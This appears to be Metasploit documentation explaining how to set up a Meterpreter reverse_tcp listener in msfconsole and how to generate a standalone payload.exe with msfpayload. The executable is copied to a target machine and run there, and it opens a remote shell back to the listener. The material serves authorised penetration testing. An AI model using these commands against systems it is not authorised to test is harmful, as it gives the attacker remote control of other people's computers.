Use Meterpreter Locally Without an Exploit

Metasploit Pro

Create a new project, click on Campaigns, create a new Campaign, enable the USB Campaign and configure the listener port. At this point, save the campaign, start it, then download the executable from the provided link. The session will now appear in the Sessions tab.

Alternatively, access Global Settings from the Administration menu and configure a new Persistent Listener through this interface, choosing the type of payload you want this listener to support (reverse_tcp, reverse_https, etc.). Once the listener is set up, see the steps below for the Metasploit Framework to create the executable.

The steps listed below for Metasploit Community and Metasploit Framework can also be used without leveraging the Campaign feature in Metasploit Pro.

Metasploit Framework

Open a Metasploit Console by first launching the console from the Start Menu on Windows or using the “msfpro” or “msfconsole” links on Linux. Once the console is open, enter the following commands:

    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 192.168.0.100
    msf exploit(handler) > set LPORT 4444
    msf exploit(handler) > set ExitOnSession false
    msf exploit(handler) > exploit -j

This will run a handler listener in the background. Change 192.168.0.100 to whatever your machine’s IP is, but do not set this to 127.0.0.1 (this is special-cased in Metasploit). Once the listener is running, it’s time to generate the actual payload.

Open a command shell with access to the Metasploit environment. On Windows, this is a link to the System Console; on Linux, this is /opt/metasploit-4.1.2/diagnostic_shell. Linux users may not need to do this at all if msfconsole is already within their path.

From the shell, execute the following command:

Windows:

    C:\metasploit > ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 X > payload.exe

Linux:

    $ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 X > payload.exe

Copy this EXE to your intended target and execute it. The session will be visible in the Metasploit Console (or in the Sessions tab if you used one of the commercial or community products to create the listener).